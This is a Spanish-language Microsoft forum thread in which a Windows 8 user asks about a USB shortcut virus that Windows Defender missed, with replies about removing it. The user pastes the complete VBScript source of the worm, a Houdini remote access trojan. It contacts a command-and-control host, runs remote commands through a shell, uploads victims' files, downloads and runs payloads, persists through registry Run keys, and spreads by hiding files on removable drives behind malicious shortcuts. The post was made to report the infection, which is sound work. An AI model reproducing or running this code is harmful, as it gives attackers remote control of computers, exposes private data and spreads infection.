none
Virus Acceso directo en discos extraibles

    Question

  • buen dia 

    tengo un problema con un virus que no detecta windows defender en windows 8, cada vez que conecto un disco extraible se infecta con accesos directos y oculta los archivos.

    revisando en el registro HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    me encuentro con lo siguiente avgeuadcci que apunta a ejecutar el siguiente script

          

    '<[ recoder : houdini (c) skype : houdini-fx ]>

    '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    host = "mostafamrsasa.servehttp.com"
    port = 82
    installdir = "%temp%"
    lnkfile = true
    lnkfolder = true

    '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

    dim shellobj 
    set shellobj = wscript.createobject("wscript.shell")
    dim filesystemobj
    set filesystemobj = createobject("scripting.filesystemobject")
    dim httpobj
    set httpobj = createobject("msxml2.xmlhttp")


    '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

    installname = wscript.scriptname
    startup = shellobj.specialfolders ("startup") & "\"
    installdir = shellobj.expandenvironmentstrings(installdir) & "\"
    if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
    spliter = "<" & "|" & ">"
    sleep = 5000 
    dim response
    dim cmd
    dim param
    info = ""
    usbspreading = ""
    startdate = ""
    dim oneonce

    '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
    on error resume next


    instance
    while true

    install

    response = ""
    response = post ("is-ready","")
    cmd = split (response,spliter)
    select case cmd (0)
    case "excecute"
          param = cmd (1)
          execute param
    case "update"
          param = cmd (1)
          oneonce.close
          set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
          oneonce.write param
          oneonce.close
          shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
          wscript.quit 
    case "uninstall"
          uninstall
    case "send"
          download cmd (1),cmd (2)
    case "site-send"
          sitedownloader cmd (1),cmd (2)
    case "recv"
          param = cmd (1)
          upload (param)
    case  "enum-driver"
          post "is-enum-driver",enumdriver  
    case  "enum-faf"
          param = cmd (1)
          post "is-enum-faf",enumfaf (param)
    case  "enum-process"
          post "is-enum-process",enumprocess   
    case  "cmd-shell"
          param = cmd (1)
          post "is-cmd-shell",cmdshell (param)  
    case  "delete"
          param = cmd (1)
          deletefaf (param) 
    case  "exit-process"
          param = cmd (1)
          exitprocess (param) 
    case  "sleep"
          param = cmd (1)
          sleep = eval (param)        
    end select

    wscript.sleep sleep

    wend


    sub install
    on error resume next
    dim lnkobj
    dim filename
    dim foldername
    dim fileicon
    dim foldericon

    upstart
    for each drive in filesystemobj.drives

    if  drive.isready = true then
    if  drive.freespace  > 0 then
    if  drive.drivetype  = 1 then
        filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
        if  filesystemobj.fileexists (drive.path & "\" & installname)  then
            filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
        end if
        for each file in filesystemobj.getfolder( drive.path & "\" ).Files
            if not lnkfile then exit for
            if  instr (file.name,".") then
                if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                    file.attributes = 2+4
                    if  ucase (file.name) <> ucase (installname) then
                        filename = split(file.name,".")
                        set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                        lnkobj.windowstyle = 7
                        lnkobj.targetpath = "cmd.exe"
                        lnkobj.workingdirectory = ""
                        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                        fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                        if  instr (fileicon,",") = 0 then
                            lnkobj.iconlocation = file.path
                        else 
                            lnkobj.iconlocation = fileicon
                        end if
                        lnkobj.save()
                    end if
                end if
            end if
        next
        for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
            if not lnkfolder then exit for
            folder.attributes = 2+4
            foldername = folder.name
            set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
            lnkobj.windowstyle = 7
            lnkobj.targetpath = "cmd.exe"
            lnkobj.workingdirectory = ""
            lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
            foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
            if  instr (foldericon,",") = 0 then
                lnkobj.iconlocation = folder.path
            else 
                lnkobj.iconlocation = foldericon
            end if
            lnkobj.save()
        next
    end If
    end If
    end if
    next
    err.clear
    end sub

    sub uninstall
    on error resume next
    dim filename
    dim foldername

    shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
    shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
    filesystemobj.deletefile startup & installname ,true
    filesystemobj.deletefile wscript.scriptfullname ,true

    for  each drive in filesystemobj.drives
    if  drive.isready = true then
    if  drive.freespace  > 0 then
    if  drive.drivetype  = 1 then
        for  each file in filesystemobj.getfolder ( drive.path & "\").files
             on error resume next
             if  instr (file.name,".") then
                 if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                     file.attributes = 0
                     if  ucase (file.name) <> ucase (installname) then
                         filename = split(file.name,".")
                         filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                     else
                         filesystemobj.deletefile (drive.path & "\" & file.name)
                     end If
                 else
                     filesystemobj.deletefile (file.path) 
                 end if
             end if
         next
         for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
             folder.attributes = 0
         next
    end if
    end if
    end if
    next
    wscript.quit
    end sub

    function post (cmd ,param)

    post = param
    httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
    httpobj.setrequestheader "user-agent:",information
    httpobj.send param
    post = httpobj.responsetext
    end function

    function information
    on error resume next
    if  inf = "" then
        inf = hwid & spliter 
        inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
        inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

        set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
        set os = root.execquery ("select * from win32_operatingsystem")
        for each osinfo in os
           inf = inf & osinfo.caption & spliter  
           exit for
        next
        inf = inf & "plus" & spliter
        inf = inf & security & spliter
        inf = inf & usbspreading
        information = inf  
    else
        information = inf
    end if
    end function


    sub upstart ()
    on error resume Next

    shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
    shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
    filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
    filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

    end sub


    function hwid
    on error resume next

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set disks = root.execquery ("select * from win32_logicaldisk")
    for each disk in disks
        if  disk.volumeserialnumber <> "" then
            hwid = disk.volumeserialnumber
            exit for
        end if
    next
    end function


    function security 
    on error resume next

    security = ""

    set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
    for each objitem in colitems
        versionstr = split (objitem.version,".")
    next
    versionstr = split (colitems.version,".")
    osversion = versionstr (0) & "."
    for  x = 1 to ubound (versionstr)
    osversion = osversion &  versionstr (i)
    next
    osversion = eval (osversion)
    if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

    set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
    Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

    for each objantivirus in colantivirus
        security  = security  & objantivirus.displayname & " ."
    next
    if security  = "" then security  = "nan-av"
    end function


    function instance
    on error resume next

    usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
    if usbspreading = "" then
       if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
          usbspreading = "true - " & date
          shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
       else
          usbspreading = "false - " & date
          shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

       end if
    end If



    upstart
    set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
    set installfullnameshort =  filesystemobj.getfile (installdir & installname)
    if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
        shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
        wscript.quit 
    end If
    err.clear
    set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
    if  err.number > 0 then wscript.quit
    end function


    sub sitedownloader (fileurl,filename)

    strlink = fileurl
    strsaveto = installdir & filename
    set objhttpdownload = createobject("msxml2.xmlhttp" )
    objhttpdownload.open "get", strlink, false
    objhttpdownload.send

    set objfsodownload = createobject ("scripting.filesystemobject")
    if  objfsodownload.fileexists (strsaveto) then
        objfsodownload.deletefile (strsaveto)
    end if

    if objhttpdownload.status = 200 then
       dim  objstreamdownload
       set  objstreamdownload = createobject("adodb.stream")
       with objstreamdownload
    .type = 1 
    .open
    .write objhttpdownload.responsebody
    .savetofile strsaveto
    .close
       end with
       set objstreamdownload = nothing
    end if
    if objfsodownload.fileexists(strsaveto) then
       shellobj.run objfsodownload.getfile (strsaveto).shortpath
    end if 
    end sub

    sub download (fileurl,filedir)

    if filedir = "" then 
       filedir = installdir
    end if

    strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
    set objhttpdownload = createobject("msxml2.xmlhttp")
    objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
    objhttpdownload.send ""

    set objfsodownload = createobject ("scripting.filesystemobject")
    if  objfsodownload.fileexists (strsaveto) then
        objfsodownload.deletefile (strsaveto)
    end if
    if  objhttpdownload.status = 200 then
        dim  objstreamdownload
    set  objstreamdownload = createobject("adodb.stream")
        with objstreamdownload 
    .type = 1 
    .open
    .write objhttpdownload.responsebody
    .savetofile strsaveto
    .close
    end with
        set objstreamdownload  = nothing
    end if
    if objfsodownload.fileexists(strsaveto) then
       shellobj.run objfsodownload.getfile (strsaveto).shortpath
    end if 
    end sub


    function upload (fileurl)

    dim  httpobj,objstreamuploade,buffer
    set  objstreamuploade = createobject("adodb.stream")
    with objstreamuploade 
         .type = 1 
         .open
    .loadfromfile fileurl
    buffer = .read
    .close
    end with
    set objstreamdownload = nothing
    set httpobj = createobject("msxml2.xmlhttp")
    httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
    httpobj.send buffer
    end function


    function enumdriver ()

    for  each drive in filesystemobj.drives
    if   drive.isready = true then
         enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
    end if
    next
    end Function

    function enumfaf (enumdir)

    enumfaf = enumdir & spliter
    for  each folder in filesystemobj.getfolder (enumdir).subfolders
         enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
    next

    for  each file in filesystemobj.getfolder (enumdir).files
         enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

    next
    end function


    function enumprocess ()

    on error resume next

    set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
    set colitems = objwmiservice.execquery("select * from win32_process",,48)

    dim objitem
    for each objitem in colitems
    enumprocess = enumprocess & objitem.name & "|"
    enumprocess = enumprocess & objitem.processid & "|"
        enumprocess = enumprocess & objitem.executablepath & spliter
    next
    end function

    sub exitprocess (pid)
    on error resume next

    shellobj.run "taskkill /F /T /PID " & pid,7,true
    end sub

    sub deletefaf (url)
    on error resume next

    filesystemobj.deletefile url
    filesystemobj.deletefolder url

    end sub

    function cmdshell (cmd)

    dim httpobj,oexec,readallfromany

    set oexec = shellobj.exec ("%comspec% /c " & cmd)
    if not oexec.stdout.atendofstream then
       readallfromany = oexec.stdout.readall
    elseif not oexec.stderr.atendofstream then
       readallfromany = oexec.stderr.readall
    else 
       readallfromany = ""
    end if

    cmdshell = readallfromany
    end function

    dicho scrip esta en el archivo avgeuadcci..vbs Gracias por su colaboracion

    Sunday, July 28, 2013 5:52 AM

Answers

  • Bueno después de pasar varios software para la eliminación de virus y códigos malignos que ninguno detecto el problema, y cada vez que borraba de forma manual el virus volvía a activarse, entonces decidí iniciar el pc en modo seguro y borrar el archivo y la entrada al registro manualmente, dando la solución al problema. Insisto que este virus debería de ser detectado por el Windows defender incluido en Windows 8. La petición para la gente de Microsoft es que solucionen este incoveniente por eso deje anteriormente el código del virus y el nombre del archivo
    • Marked as answer by aboss Monday, July 29, 2013 9:35 PM
    Sunday, July 28, 2013 6:58 PM

All replies

  • Bueno después de pasar varios software para la eliminación de virus y códigos malignos que ninguno detecto el problema, y cada vez que borraba de forma manual el virus volvía a activarse, entonces decidí iniciar el pc en modo seguro y borrar el archivo y la entrada al registro manualmente, dando la solución al problema. Insisto que este virus debería de ser detectado por el Windows defender incluido en Windows 8. La petición para la gente de Microsoft es que solucionen este incoveniente por eso deje anteriormente el código del virus y el nombre del archivo
    • Marked as answer by aboss Monday, July 29, 2013 9:35 PM
    Sunday, July 28, 2013 6:58 PM
  • Hi, found this virus in one of the systems i'm administrating, too.

    Analyzed it and created a specific removal tool - interested in?

    Best regards from Germany,

     Sebastian Kraemer

    Friday, September 20, 2013 11:01 PM